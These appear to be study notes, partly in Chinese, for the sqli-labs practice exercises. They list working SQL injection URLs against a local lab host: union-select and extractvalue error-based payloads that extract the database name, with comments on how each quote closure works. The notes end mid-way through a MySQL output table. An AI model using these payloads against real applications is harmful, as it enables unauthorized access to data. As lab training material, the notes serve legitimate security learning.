GET - Error based
1. Single quotes-String
http://192.168.205.128:8080/Less-1/?id=-1%27%20union%20select%201,2,database()%23
2. Intiger based
http://192.168.205.128:8080/Less-2/?id=-1%20union%20select%201,2,database()%23
3. Single quotes with twist-string
http://192.168.205.128:8080/Less-3/?id=-1%27)%20union%20select%201,2,database()%23
# 用单引号加括号闭合参数 ')
4. Double quotes-String
http://192.168.205.128:8080/Less-4/?id=-1%22)%20union%20select%201,2,database()%23
# 双引号加括号闭合参数 ")
GET - Double Injection
5. Single quotes - String
Double Injection指双查询注入,下面的参考链接讲得非常详细
参考链接:https://blog.csdn.net/wn314/article/details/89297560
http://192.168.205.128:8080/Less-5/?
id=-1%27%20union%20select%20extractvalue(0,concat(0x5C,%20(select%20database())))%23
# 这一段主要是利用读取xml的报错,extractvalue是读取xml,0指xml内容,concat()部分指指定xml的有效xpath,当xpath错误时会报错
# 正常extractvalue语句为:
mysql> select extractvalue('<a>123</a><b>456</b>', '/b');
+--------------------------------------------+
| extractvalue('<a>123</a><b>456</b>', '/b') |
+-----